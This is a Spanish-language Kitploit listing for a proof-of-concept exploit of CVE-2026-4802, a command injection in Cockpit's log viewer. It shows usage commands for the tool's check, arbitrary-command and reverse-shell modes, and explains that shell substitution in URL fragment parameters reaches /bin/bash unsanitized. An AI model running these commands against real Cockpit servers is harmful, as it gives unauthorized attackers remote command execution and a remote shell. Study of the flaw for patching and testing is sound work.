Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/hakaioffsec/cve-2026-4802
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubhakaioffsec/cve-2026-4802

CVE-2026-4802

Prueba de concepto de exploit para CVE-2026-4802, una vulnerabilidad de inyección de comandos en la interfaz de registros del sistema de Cockpit, que permite la ejecución arbitraria de comandos y shells inversas.

Ver Repositorio
414hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-4802 - Ejecución Remota de Código mediante Inyección de Comandos en Cockpit

Un exploit de prueba de concepto para CVE-2026-4802, una Ejecución Remota de Código mediante Inyección de Comandos en la interfaz de registros del sistema de Cockpit (loadServiceFilters())

Configuración

Compila y ejecuta el entorno vulnerable:

root@kitploit:~
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln

Uso

root@kitploit:~
# Comprueba si el objetivo es vulnerable
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check

# Ejecuta comandos arbitrarios
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"

# Shell inversa
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

Versiones Vulnerables

  • Cockpit (versiones sin parchear con pkg/systemd/logsJournal.jsx)

Causa Raíz

La función loadServiceFilters() en pkg/systemd/logsJournal.jsx construye comandos de shell uniendo arrays en cadenas con solo un escape de espacios antes de pasarlos a /bin/bash -ec. Los parámetros controlados por el usuario desde el fragmento de URL de la página de registros (p. ej. --since=) llegan a esta ruta de código sin sanitizar, lo que permite la inyección de metacaracteres de shell como la sustitución de comandos ($(...)).

Aviso Legal

Esta herramienta es solo para fines educativos y de investigación. Úsala únicamente en sistemas que poseas o para los que tengas permiso explícito de prueba. El autor no es responsable de ningún uso indebido o daño causado por este programa.

QuimeraX Intelligence

QuimeraX Intelligence es una plataforma avanzada de EASM e Inteligencia de Amenazas Cibernéticas especializada en identificar vulnerabilidades críticas en sistemas complejos. La plataforma supervisa, detecta y alerta proactivamente a los clientes sobre amenazas de seguridad, garantizando transparencia y una respuesta rápida ante riesgos potenciales. Los clientes reciben notificaciones inmediatas e informes completos si sus sistemas se encuentran vulnerables, lo que les permite tomar medidas de protección. aprende más

Hakai Security

Hakai Security es una empresa de ciberseguridad fundada por profesionales de la seguridad, comprometida con la excelencia técnica. Ofrecemos soluciones de seguridad a medida que incluyen pruebas de penetración avanzadas, simulaciones realistas de Red Team y prácticas de desarrollo seguro para proteger proactivamente los activos de nuestros clientes frente a las amenazas cibernéticas en evolución.

Referencias

  • https://bugzilla.redhat.com/show_bug.cgi?id=2451155
  • https://access.redhat.com/security/cve/CVE-2026-4802
  • https://www.cve.org/CVERecord?id=CVE-2026-4802
Descargar herramienta